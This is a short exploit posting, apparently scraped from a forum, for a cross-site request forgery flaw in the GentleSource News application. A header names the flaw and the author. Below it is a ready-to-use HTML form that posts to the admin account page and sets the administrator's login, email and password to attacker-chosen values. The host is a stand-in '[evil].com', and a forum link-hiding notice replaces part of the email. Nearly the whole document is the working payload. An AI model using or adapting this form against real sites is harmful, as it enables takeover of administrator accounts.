< ------------------- header data start ------------------- >

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# Application Name : GentleSource News
# Vulnerable Type : XSRF
# Infection : Administrator Informations can change.
# Author : BARCOD3

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< ------------------- header data end of ------------------- >

<form action=[evil].com/path/admin/account.php method=post name=account id=account>
<input name=login_name type=text value=admin />
<input name=email type=text value=admin@[Linkleri Görebilmek için ÜYE Olmalısınız!Hemen ÜYE OL!].com />
<input name=password type=password value=youroption/>
<input name=repeat type=password value=youroption />
<input name=save value=Save Account type=submit />

< -- bug code end of -- >